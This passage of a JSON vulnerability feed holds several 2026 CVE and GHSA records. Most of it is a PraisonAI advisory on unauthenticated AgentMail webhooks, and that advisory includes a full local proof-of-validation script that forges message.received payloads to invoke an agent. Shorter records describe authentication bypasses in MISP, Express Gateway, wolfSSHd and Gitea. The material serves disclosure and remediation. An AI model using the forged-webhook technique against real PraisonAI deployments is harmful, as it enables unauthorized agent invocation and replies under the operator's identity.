2.1"],"cwes":["CWE-287","CWE-613"],"tags":["nvd","status:received","status:deferred","osv","osv:ghsa-v3x9-6gg8-c2c9","ecosystem:pypi"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/wger-project/wger/releases/tag/2.6","type":"other","title":"OSV web"},{"url":"https://github.com/wger-project/wger/security/advisories/GHSA-v3x9-6gg8-c2c9","type":"other","title":"OSV web"},{"url":"https://osv.dev/vulnerability/GHSA-v3x9-6gg8-c2c9","type":"advisory","title":"OSV GHSA-v3x9-6gg8-c2c9"},{"url":"https://github.com/wger-project/wger","type":"vendor","title":"OSV package"}],"epssScore":0.00185,"epssPercentile":0.07411,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-07T14:17:10.467Z","addedAt":"2026-10-07T14:39:35.266Z","updatedAt":"2026-10-07T18:42:45.468Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-46437","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-46437","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-V3X9-6GG8-C2C9"}]},{"id":"81f341bf-d6d8-4d76-b1ac-74bb5f469e7e","slug":"cve-2026-61436","externalId":"GHSA-7c92-x8vg-4258","source":"OSV","sourceType":"ghsa","type":"vulnerability","title":"PraisonAI: AgentMail webhook mode accepts forged unsigned message.received events and invokes agents","description":"# AgentMail webhook mode accepts forged unsigned message.received events and invokes agents\n\n## Summary\n\n`praisonai` AgentMail webhook mode exposes a public aiohttp webhook endpoint that accepts caller-controlled `message.received` JSON without verifying AgentMail's Svix webhook signatures, then dispatches the forged message into the configured agent session and reply path.\n\n## Technical Details\n\nThe affected boundary is webhook authenticity. AgentMail's webhook verification documentation says AgentMail delivers webhooks through Svix and includes `svix-id`, `svix-timestamp`, and `svix-signature` headers. Receivers are expected to verify the raw request body with the endpoint signing secret, commonly stored as `AGENTMAIL_WEBHOOK_SECRET`, before trusting the event body. AgentMail's documented verified payload examples route on `event_type`; the forged payload below intentionally uses PraisonAI's accepted handler shape, `type` plus `data`, because that is the shape `_handle_email_webhook()` accepts before any signature verification.\n\n`src/praisonai/praisonai/bots/agentmail.py` exposes webhook mode through `AgentMailBot(mode=...)` or a `BotConfig` whose `mode` is `webhook`. In `_start_webhook_mode()`, PraisonAI registers `POST {webhook_path}` and binds the aiohttp site to `0.0.0.0` on the configured webhook port. When `config.webhook_url` is set, the same method calls `client.webhooks.create(url=..., event_types=[\"message.received\"], inbox_ids=...)`, but it does not store or use the returned webhook secret.\n\nThe handler then trusts the parsed JSON body. `_handle_email_webhook()` calls `await request.json()`, reads `body.get(\"type\", \"\")`, and if the value is `message.received`, schedules `_process_webhook_payload(body)` and returns `200 OK`. It does not read the raw body, inspect request headers, verify `svix-id`, verify `svix-timestamp`, verify `svix-signature`, or check any webhook secret before scheduling the event.\n\n`_process_webhook_payload()` builds a `BotMessage` from attacker-controlled JSON fields: `data.message_id`, `data.from`/`data.from_`, `data.subject`, `data.extracted_text`/`data.text`, `data.thread_id`, and `data.in_reply_to`. It then calls `_handle_message(message)`. `_handle_message()` fires message hooks, calls `self._session.chat(self._agent, sender_id, body, ...)`, and, when the agent returns a response, attempts to reply to the attacker-controlled sender address through AgentMail.\n\nThis report is scoped to AgentMail webhook mode. It does not claim that the default polling path or WebSocket path is affected. The WebSocket path receives typed `MessageReceivedEvent` instances from the AgentMail SDK connection; the webhook path exposes a public HTTP receiver and therefore needs an independent signature check before parsing/trusting the event.\n\n## PoV\n\nthe PoV calls the webhook handler directly with fake request objects. It does not bind a port, contact AgentMail, send email, or use live credentials.\n\nThe forged JSON uses PraisonAI's accepted webhook-handler shape: a top-level `type` field with value `message.received` and a nested `data` object. This is not presented as the canonical signed AgentMail payload shape; AgentMail's verification documentation shows verified messages using `event_type` after Svix verification. The issue is that PraisonAI accepts the unauthenticated `type`/`data` body and dispatches it before verifying that the request came from AgentMail.\n\nEssential PoV excerpt:\n\n```python\nclass FakeRequest:\n    def __init__(self, body, headers=None, json_error=False):\n        self._body = body\n        self.headers = headers or {}\n        self._json_error = json_error\n\n    async def json(self):\n        if self._json_error:\n            raise ValueError(\"invalid json\")\n        return self._body\n\nbot = AgentMailBot(\n    token=\"am_local_test\",\n    agent=object(),\n    inbox_id=\"assistant@example.test\",\n    config=BotConfig(mode=\"webhook\", webhook_path=\"/webhook\"),\n)\nbot._inbox_id = \"assistant@example.test\"\nbot._email_address = \"assistant@example.test\"\nbot._config = {}\nbot._session = RecordingSession()\n\npayload = {\n    \"type\": \"message.received\",\n    \"data\": {\n        \"message_id\": \"msg-forged-invalid-svix\",\n        \"from\": \"attacker@example.test\",\n        \"subject\": \"Forged invalid signature\",\n        \"extracted_text\": \"invalid signature forged body\",\n    },\n}\nheaders = {\n    \"svix-id\": \"msg_bad\",\n    \"svix-timestamp\": \"1\",\n    \"svix-signature\": \"v1,definitely-invalid\",\n}\n\nresponse = await bot._handle_email_webhook(FakeRequest(payload, headers=headers))\nawait asyncio.sleep(0)\n```\n\nExpected vulnerable behavior: the response status is `200`, the invalid Svix signature is ignored, and the fake session records one agent call with `sender_id` set to `attacker@example.test` and `body` set to `invalid signature forged body`.\n\n## PoC\n\nCurrent head tested:\n\n```text\n846568c7a5d8ce9e71e56e4c213f027c04909753\n```\n\nRun against a local checkout of current head:\n\n```fish\npython3 pov_agentmail_webhook_forgery.py --repo /path/to/PraisonAI --label current-head-846568c\n```\n\nDecisive current-head output:\n\n```json\n{\n  \"label\": \"current-head-846568c\",\n  \"vulnerable\": true,\n  \"cases\": {\n    \"forged_unsigned_message\": {\n      \"http_status\": 200,\n      \"session_delta\": 1,\n      \"send_delta\": 1\n    },\n    \"forged_invalid_svix_signature\": {\n      \"http_status\": 200,\n      \"session_delta\": 1,\n      \"send_delta\": 1\n    },\n    \"invalid_json_control\": {\n      \"http_status\": 400,\n      \"session_delta\": 0\n    },\n    \"non_message_event_control\": {\n      \"http_status\": 200,\n      \"session_delta\": 0\n    },\n    \"duplicate_message_control\": {\n      \"http_status\": 200,\n      \"session_delta\": 0\n    }\n  }\n}\n```\n\nRun against the latest release tag observed during testing:\n\n```fish\npython3 pov_agentmail_webhook_forgery.py --repo /path/to/PraisonAI-v4.6.62 --label v4.6.62-2a855c47\n```\n\nDecisive `v4.6.62` output:\n\n```json\n{\n  \"label\": \"v4.6.62-2a855c47\",\n  \"vulnerable\": true,\n  \"cases\": {\n    \"forged_unsigned_message\": {\n      \"http_status\": 200,\n      \"session_delta\": 1,\n      \"send_delta\": 1\n    },\n    \"forged_invalid_svix_signature\": {\n      \"http_status\": 200,\n      \"session_delta\": 1,\n      \"send_delta\": 1\n    },\n    \"invalid_json_control\": {\n      \"http_status\": 400,\n      \"session_delta\": 0\n    },\n    \"non_message_event_control\": {\n      \"http_status\": 200,\n      \"session_delta\": 0\n    },\n    \"duplicate_message_control\": {\n      \"http_status\": 200,\n      \"session_delta\": 0\n    }\n  }\n}\n```\n\nInterpretation: forged unsigned webhook JSON and forged webhook JSON with invalid Svix headers both return `200` and reach the agent session once. Invalid JSON returns `400` without an agent call, non-`message.received` events are ignored, and repeated `message_id` values are deduplicated. The controls prove the handler is executing the intended branch and that the issue is specifically missing webhook authenticity verification before the agent dispatch branch.\n\n## Impact\n\nIf a PraisonAI operator exposes AgentMail webhook mode, any network caller who can reach the webhook URL can spoof incoming AgentMail email events and invoke the configured PraisonAI agent as an arbitrary sender. The attacker controls the message id, sender address, subject, body text, and thread metadata consumed by the bot.\n\nThe concrete boundary crossed is unauthenticated remote agent invocation through forged AgentMail webhook events. Downstream impact depends on the deployed agent and tools. PraisonAI bot defaults can include model calls and safe auto-approved tools, so this can cause unauthorized model/API usage, forged workflow input, replies under the AgentMail inbox identity, and confidentiality or integrity impact when the configured agent has access to sensitive context or tools.\n\nThis report does not claim arbitrary code execution by default, compromise of AgentMail itself, or bypass of the default poll mode.\n\nSuggested severity: High. Suggested CVSS v3.1: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L` (8.6). Suggested CWEs: `CWE-347` Improper Verification of Cryptographic Signature, `CWE-306` Missing Authentication for Critical Function, and `CWE-287` Improper Authentication.\n\n## Suggested Fix\n\nFail closed for AgentMail webhook mode unless a webhook signing secret is configured. Store the AgentMail webhook secret returned by `client.webhooks.create(...)`, or require an explicit `agentmail_webhook_secret`/`AGENTMAIL_WEBHOOK_SECRET` configuration value for existing webhook endpoints.\n\nVerify the raw request body with the official Svix verifier before JSON parsing is trusted. Reject missing, malformed, stale, or invalid `svix-id`, `svix-timestamp`, and `svix-signature` headers before scheduling `_process_webhook_payload()`. Do not use `await request.json()` as the verification input; signature verification needs the exact raw body bytes.\n\nSuggested regression tests:\n\n- webhook mode without a configured signing secret refuses startup or returns `401`/`400` for `message.received`;\n- missing Svix headers do not call `_process_webhook_payload()`;\n- invalid Svix signature does not call `_process_webhook_payload()`;\n- stale timestamp does not call `_process_webhook_payload()`;\n- valid Svix signature for the raw body reaches `_process_webhook_payload()`;\n- duplicate `message_id` behavior remains intact after verification succeeds.\n\n## Affected Package/Versions\n\nAffected package: `pypi:praisonai`.\n\nLatest PyPI version observed during testing: `4.6.62`. Current head `846568c7a5d8ce9e71e56e4c213f027c04909753` is affected. Latest release tag `v4.6.62` at commit `2a855c470077c7d2e2479a575f7ef7f548d51c33` is affected.\n\nSampled tag sweep:\n\n```text\nv4.4.12   agentmail_absent\nv4.5.16   agentmail_absent\nv4.5.128  present_unsigned_webhook\nv4.6.33   present_unsigned_webhook\nv4.6.58   present_unsigned_webhook\nv4.6.59   present_unsigned_webhook\nv4.6.60   present_unsigned_webhook\nv4.6.62   present_unsigned_webhook\ncurrent   present_unsigned_webhook\n```\n\nConservative suggested affected range: AgentMail webhook-bearing `praisonai` releases at least `>= 4.5.128, <= 4.6.62`, plus current head. The component was absent in sampled tags `v4.4.12` and `v4.5.16`. No fixed version or fix commit was observed.\n\n## Advisory History\n\nVisible PraisonAI advisories were checked for the same root cause, affected entrypoint, and exploit preconditions. No exact duplicate was found for AgentMail webhook mode accepting unsigned or invalid-Svix `message.received` events and dispatching them into `AgentMailBot._handle_message()`.\n\nNearby advisories are distinct:\n\n- `GHSA-fc26-m9pf-v56q`, \"PraisonAI LinearBot processes unsigned webhooks when LINEAR_WEBHOOK_SECRET is missing\", covers the Linear integration and a fail-open missing-secret condition. This report covers AgentMail webhook mode, a different integration, different handler, different provider signature scheme, and no visible webhook-secret validation path.\n- `GHSA-x92v-rpx6-p6cw`, \"Webhook signature verification skipped (fail-open) when secret unset, allowing forged inbound webhooks (WhatsApp & Linear bots)\", covers WhatsApp/Linear webhook verification fail-open behavior. This report covers AgentMail and Svix-backed AgentMail webhook delivery.\n- `GHSA-qvpf-j64c-jmhr`, \"PraisonAI Slack app_mention bypasses configured user/channel authorization\", covers Slack event authorization, not AgentMail webhook authenticity.\n- `GHSA-vg22-4gmj-prxw` / `CVE-2026-47391` cover unauthenticated A2A `message/send`, not AgentMail webhooks.\n- `GHSA-86qc-r5v2-v6x6` covers the call server token gap, not AgentMail webhook delivery.\n\nPublic Platform authorization advisories cover Platform RBAC/IDOR classes such as object ownership and workspace authorization. They do not cover AgentMail webhook authenticity or the AgentMail `message.received` dispatch path.\n\n## References\n\n- AgentMail webhook verification documentation: https://www.agentmail.to/docs/webhook-verification\n- AgentMail create webhook API reference: https://www.agentmail.to/docs/api-reference/webhooks/create\n- PraisonAI LinearBot webhook advisory: https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-fc26-m9pf-v56q\n- PraisonAI WhatsApp/Linear webhook fail-open advisory: https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-x92v-rpx6-p6cw\n- PraisonAI Slack authorization advisory: https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-qvpf-j64c-jmhr\n- MITRE CWE-347: https://cwe.mitre.org/data/definitions/347.html\n- MITRE CWE-306: https://cwe.mitre.org/data/definitions/306.html\n- MITRE CWE-287: https://cwe.mitre.org/data/definitions/287.html\n\n## Appendix A - Full PoV Script\n\n```python\n#!/usr/bin/env python3\n\"\"\"PoV for PraisonAI AgentMail webhook authenticity.\n\nThe script calls the AgentMail webhook handler directly with fake aiohttp\nrequests. It does not bind a port, contact AgentMail, or send email.\n\"\"\"\n\nfrom __future__ import annotations\n\nimport argparse\nimport asyncio\nimport json\nimport sys\nimport types\nfrom pathlib import Path\nfrom typing import Any\n\n\nclass FakeResponse:\n    def __init__(self, status: int = 200, text: str = \"\", content_type: str | None = None):\n        self.status = status\n        self.text = text\n        self.content_type = content_type\n\n\nclass FakeRequest:\n    def __init__(self, body: dict[str, Any] | None, headers: dict[str, str] | None = None, json_error: bool = False):\n        self._body = body\n        self.headers = headers or {}\n        self._json_error = json_error\n\n    async def json(self) -> dict[str, Any]:\n        if self._json_error:\n            raise ValueError(\"invalid json\")\n        return self._body or {}\n\n\nclass RecordingSession:\n    def __init__(self) -> None:\n        self.calls: list[dict[str, Any]] = []\n\n    async def chat(self, agent: object, sender_id: str, body: str, **kwargs: Any) -> str:\n        self.calls.append(\n            {\n                \"sender_id\": sender_id,\n                \"body\": body,\n                \"chat_id\": kwargs.get(\"chat_id\"),\n                \"message_id\": kwargs.get(\"message_id\"),\n                \"account\": kwargs.get(\"account\"),\n            }\n        )\n        return \"local agent response\"\n\n\ndef install_fake_aiohttp() -> None:\n    web = types.SimpleNamespace(Response=FakeResponse)\n    sys.modules[\"aiohttp\"] = types.SimpleNamespace(web=web)\n\n\ndef configure_import_path(repo: Path) -> None:\n    sys.path.insert(0, str(repo / \"src\" / \"praisonai\"))\n    sys.path.insert(0, str(repo / \"src\" / \"praisonai-agents\"))\n\n\nasync def run_case(bot: Any, request: FakeRequest, sleep_ticks: int = 2) -> dict[str, Any]:\n    before_calls = len(bot._session.calls)\n    before_sends = len(bot._sent_messages)\n    response = await bot._handle_email_webhook(request)\n    for _ in range(sleep_ticks):\n        await asyncio.sleep(0)\n    return {\n        \"http_status\": response.status,\n        \"session_delta\": len(bot._session.calls) - before_calls,\n        \"send_delta\": len(bot._sent_messages) - before_sends,\n        \"session_calls\": bot._session.calls[before_calls:],\n        \"sent_messages\": bot._sent_messages[before_sends:],\n    }\n\n\nasync def main_async(repo: Path, label: str) -> dict[str, Any]:\n    install_fake_aiohttp()\n    configure_import_path(repo)\n\n    from praisonai.bots.agentmail import AgentMailBot\n    from praisonaiagents.bots import BotConfig\n\n    bot = AgentMailBot(\n        token=\"am_local_test\",\n        agent=object(),\n        inbox_id=\"assistant@example.test\",\n        config=BotConfig(mode=\"webhook\", webhook_path=\"/webhook\"),\n    )\n    bot._inbox_id = \"assistant@example.test\"\n    bot._email_address = \"assistant@example.test\"\n    bot._config = {}\n    bot._session = RecordingSession()\n    bot._sent_messages = []\n\n    async def fake_send_message(**kwargs: Any) -> None:\n        bot._sent_messages.append(kwargs)\n\n    bot.send_message = fake_send_message\n\n    invalid_svix_headers = {\n        \"svix-id\": \"msg_bad\",\n        \"svix-timestamp\": \"1\",\n        \"svix-signature\": \"v1,definitely-invalid\",\n    }\n\n    cases: dict[str, Any] = {}\n    cases[\"forged_unsigned_message\"] = await run_case(\n        bot,\n        FakeRequest(\n            {\n                \"type\": \"message.received\",\n                \"data\": {\n                    \"message_id\": \"msg-forged-unsigned\",\n                    \"from\": \"attacker@example.test\",\n                    \"subject\": \"Forged unsigned message\",\n                    \"extracted_text\": \"unsigned forged body\",\n                },\n            }\n        ),\n    )\n    cases[\"forged_invalid_svix_signature\"] = await run_case(\n        bot,\n        FakeRequest(\n            {\n                \"type\": \"message.received\",\n                \"data\": {\n                    \"message_id\": \"msg-forged-invalid-svix\",\n                    \"from\": \"attacker@example.test\",\n                    \"subject\": \"Forged invalid signature\",\n                    \"extracted_text\": \"invalid signature forged body\",\n                },\n            },\n            headers=invalid_svix_headers,\n        ),\n    )\n    cases[\"invalid_json_control\"] = await run_case(bot, FakeRequest(None, json_error=True))\n    cases[\"non_message_event_control\"] = await run_case(\n        bot,\n        FakeRequest(\n            {\n                \"type\": \"domain.verified\",\n                \"data\": {\n                    \"message_id\": \"msg-non-message\",\n                    \"from\": \"attacker@example.test\",\n                    \"extracted_text\": \"should not be processed\",\n                },\n            }\n        ),\n    )\n    cases[\"duplicate_message_control\"] = await run_case(\n        bot,\n        FakeRequest(\n            {\n                \"type\": \"message.received\",\n                \"data\": {\n                    \"message_id\": \"msg-forged-invalid-svix\",\n                    \"from\": \"attacker@example.test\",\n                    \"subject\": \"Duplicate\",\n                    \"extracted_text\": \"duplicate should not create a second call\",\n                },\n            },\n            headers=invalid_svix_headers,\n        ),\n    )\n\n    vulnerable = (\n        cases[\"forged_unsigned_message\"][\"http_status\"] == 200\n        and cases[\"forged_unsigned_message\"][\"session_delta\"] == 1\n        and cases[\"forged_invalid_svix_signature\"][\"http_status\"] == 200\n        and cases[\"forged_invalid_svix_signature\"][\"session_delta\"] == 1\n        and cases[\"invalid_json_control\"][\"http_status\"] == 400\n        and cases[\"invalid_json_control\"][\"session_delta\"] == 0\n        and cases[\"non_message_event_control\"][\"session_delta\"] == 0\n        and cases[\"duplicate_message_control\"][\"session_delta\"] == 0\n    )\n\n    return {\n        \"label\": label,\n        \"repo\": str(repo),\n        \"vulnerable\": vulnerable,\n        \"finding\": \"AgentMail webhook handler accepts unsigned and invalid-Svix message.received events and dispatches them to the agent session\",\n        \"cases\": cases,\n    }\n\n\ndef main() -> int:\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"--repo\", type=Path, required=True)\n    parser.add_argument(\"--label\", default=\"current-head\")\n    args = parser.parse_args()\n    result = asyncio.run(main_async(args.repo.resolve(), args.label))\n    print(json.dumps(result, indent=2, sort_keys=True))\n    return 0 if result[\"vulnerable\"] else 1\n\n\nif __name__ == \"__main__\":\n    raise SystemExit(main())\n```","cveId":"CVE-2026-61436","cvssScore":null,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L","severity":"high","vendor":"PyPI","product":"praisonai","affectedVersions":["pkg:pypi/praisonai < 4.6.78"],"cwes":["CWE-287","CWE-306","CWE-347"],"tags":["osv","osv:ghsa-7c92-x8vg-4258","ecosystem:pypi"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://osv.dev/vulnerability/GHSA-7c92-x8vg-4258","type":"advisory","title":"OSV GHSA-7c92-x8vg-4258"},{"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-7c92-x8vg-4258","type":"other","title":"OSV web"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-61436","type":"advisory","title":"OSV advisory"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-62172","type":"advisory","title":"OSV advisory"},{"url":"https://github.com/MervinPraison/PraisonAI/commit/2a855c470077c7d2e2479a575f7ef7f548d51c33","type":"other","title":"OSV web"},{"url":"https://github.com/MervinPraison/PraisonAI/commit/846568c7a5d8ce9e71e56e4c213f027c04909753","type":"other","title":"OSV web"},{"url":"https://github.com/MervinPraison/PraisonAI","type":"vendor","title":"OSV package"},{"url":"https://www.vulncheck.com/advisories/praisonai-before-missing-webhook-signature-verification","type":"other","title":"OSV web"}],"epssScore":0.00518,"epssPercentile":0.42195,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-07T14:07:10.000Z","addedAt":"2026-10-07T18:42:45.549Z","updatedAt":"2026-10-07T18:42:45.549Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-61436","note":"may still be awaiting NVD analysis"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-61436","note":"authoritative record"},{"label":"GitHub Advisory","url":"https://github.com/advisories/GHSA-7c92-x8vg-4258"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-7c92-x8vg-4258"}]},{"id":"4eacc08a-1dfb-402b-8a24-1911670af607","slug":"cve-2026-107180","externalId":"CVE-2026-107180","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-107180 — On MISP instances configured to require TOTP enrolment (Security.otp_required), the enforcement of the mandatory two-factor authentication setup ap…","description":"On MISP instances configured to require TOTP enrolment (Security.otp_required), the enforcement of the mandatory two-factor authentication setup applied only to standard browser requests. An authenticated user who had not yet enrolled in TOTP could bypass the forced setup by issuing any non-browser request type, including AJAX/XHR calls, REST API requests, .json format URLs, restSearch queries, or automation actions. Because these machine-readable request shapes cannot follow the redirect that the browser path uses to send the user to the TOTP enrolment page, the guard simply skipped the check and the user retained full access to the instance without completing the required second-factor setup.\n\nThe initial fix (commit 8deb0619e) added a guard specifically for AJAX requests. A follow-up fix (commit 6b527ba6e) broadened the guard to cover every non-browser request shape, while preserving the exemption for identities authenticated via API key (logged_by_authkey flag).\n\nImpact: an authenticated user on an otp_required instance can operate with full access indefinitely without enrolling in TOTP, nullifying the instance-level two-factor authentication policy.\n\nAffected version: <2.5.48","cveId":"CVE-2026-107180","cvssScore":7.1,"cvssVector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"high","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-287","CWE-306"],"tags":["nvd","status:deferred"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/MISP/MISP/commit/6b527ba6e","type":"advisory","title":"5a6e4751-2f3f-4070-9419-94fb35b644e8"},{"url":"https://github.com/MISP/MISP/commit/8deb0619e","type":"advisory","title":"5a6e4751-2f3f-4070-9419-94fb35b644e8"}],"epssScore":0.00315,"epssPercentile":0.22374,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-07T13:17:22.003Z","addedAt":"2026-10-07T14:39:35.147Z","updatedAt":"2026-10-07T16:39:32.180Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-107180","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-107180","note":"authoritative record"}]},{"id":"c673c6d1-3c42-4e73-aa9f-bed48e8f5d52","slug":"cve-2026-107162","externalId":"CVE-2026-107162","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-107162 — Express Gateway through 1.16.11 contains an authentication bypass vulnerability in the OAuth 2.0 refresh_token grant that fails to validate the tok…","description":"Express Gateway through 1.16.11 contains an authentication bypass vulnerability in the OAuth 2.0 refresh_token grant that fails to validate the token secret or issuing client. Attackers with any valid client credentials and the identifier portion of another user's refresh token can obtain that user's access token and impersonate them against oauth2-protected APIs.","cveId":"CVE-2026-107162","cvssScore":7.6,"cvssVector":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"high","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-287"],"tags":["nvd","status:received","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/ExpressGateway/express-gateway","type":"advisory","title":"disclosure@vulncheck.com"},{"url":"https://github.com/ExpressGateway/express-gateway/blob/45612814d12f65889ef3bdf80b2ed7ab9b557736/lib/policies/oauth2/oauth2-server.js#L221-L247","type":"advisory","title":"disclosure@vulncheck.com"},{"url":"https://github.com/ExpressGateway/express-gateway/blob/45612814d12f65889ef3bdf80b2ed7ab9b557736/lib/services/tokens/token.service.js#L100-L136","type":"advisory","title":"disclosure@vulncheck.com"},{"url":"https://github.com/ExpressGateway/express-gateway/issues/1076","type":"advisory","title":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/express-gateway-through-1.16.11-oauth-2.0-refresh-token-validation-bypass","type":"advisory","title":"disclosure@vulncheck.com"}],"epssScore":0.00287,"epssPercentile":0.19419,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-07T13:17:19.963Z","addedAt":"2026-10-07T14:39:35.110Z","updatedAt":"2026-10-07T16:39:32.141Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-107162","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-107162","note":"authoritative record"}]},{"id":"a1925cfb-baa6-4893-85ae-b93493ffa004","slug":"cve-2026-83540","externalId":"CVE-2026-83540","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-83540 — When password or public key authentication is used with the Windows port of wolfSSHd, the Windows logon token acquired for one authenticated connec…","description":"When password or public key authentication is used with the Windows port of wolfSSHd, the Windows logon token acquired for one authenticated connection is not released before a token is acquired for a subsequent connection, resulting in user login poisoning between connections. A less privileged user with a valid account on the server can exploit this to force a login as a more privileged user. The vulnerability was introduced with the initial Windows port of wolfSSHd in wolfSSH version 1.4.15 and affects all versions through 1.5.0. Non-Windows builds of wolfSSHd are not affected.","cveId":"CVE-2026-83540","cvssScore":7.7,"cvssVector":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"high","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-287","CWE-613"],"tags":["nvd","status:received","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/wolfSSL/wolfssh","type":"advisory","title":"facts@wolfssl.com"},{"url":"https://github.com/wolfSSL/wolfssh/commit/9777bc5ce810d6c418a1473e9e8c40cdb0026e5a","type":"advisory","title":"facts@wolfssl.com"},{"url":"https://github.com/wolfSSL/wolfssh/commit/b6bd975ccfac6aadf29b98e35e09114bef3840a9","type":"advisory","title":"facts@wolfssl.com"},{"url":"https://www.wolfssl.com/docs/security-vulnerabilities/","type":"advisory","title":"facts@wolfssl.com"}],"epssScore":0.00337,"epssPercentile":0.25046,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-07T03:16:59.730Z","addedAt":"2026-10-07T04:39:33.968Z","updatedAt":"2026-10-07T16:39:31.661Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-83540","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-83540","note":"authoritative record"}]},{"id":"8c98210b-dac1-44fe-a2a9-54ed5bed32af","slug":"cve-2026-101023","externalId":"CVE-2026-101023","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-101023 — Gitea's OAuth2 token endpoint verified the signature and grant of a token submitted with the `refresh_token` grant type, but not that the token was…","description":"Gitea's OAuth2 token endpoint verified the signature and grant of a token submitted with the `refresh_token` grant type, but not that the token was a refresh token. An unexpired access token for the same OAuth2 application and grant could be exchanged for a new access token and refresh token. Whoever holds such an access token could keep access beyond the token's original lifetime.","cveId":"CVE-2026-101023","cvssScore":9.1,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N","severity":"critical","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-287"],"tags":["nvd","status:received","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://blog.gitea.com/release-of-28.1.0/","type":"advisory","title":"88ee5874-cf24-4952-aea0-31affedb7ff2"},{"url":"https://github.com/go-gitea/gitea/pull/39501","type":"advisory","title":"88ee5874-cf24-4952-aea0-31affedb7ff2"},{"url":"https://github.com/go-gitea/gitea/pull/39507","type":"advisory","title":"88ee5874-cf24-4952-aea0-31affedb7ff2"},{"url":"https://github.com/go-gitea/gitea/releases/tag/v28.1.0","type":"advisory","title":"88ee5874-cf24-4952-aea0-31affedb7ff2"},{"url":"https://github.com/go-gitea/gitea/security/advisories/GHSA-469m-x4mw-38r3","type":"advisory","title":"88ee5874-cf24-4952-aea0-31affedb7ff2"}],"epssScore":0.00353,"epssPercentile":0.26913,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-06T22:16:59.737Z","addedAt":"2026-10-06T22:39:33.137Z","updatedAt":"2026-10-07T22:39:36.282Z","epssUpdatedAt":"2026-1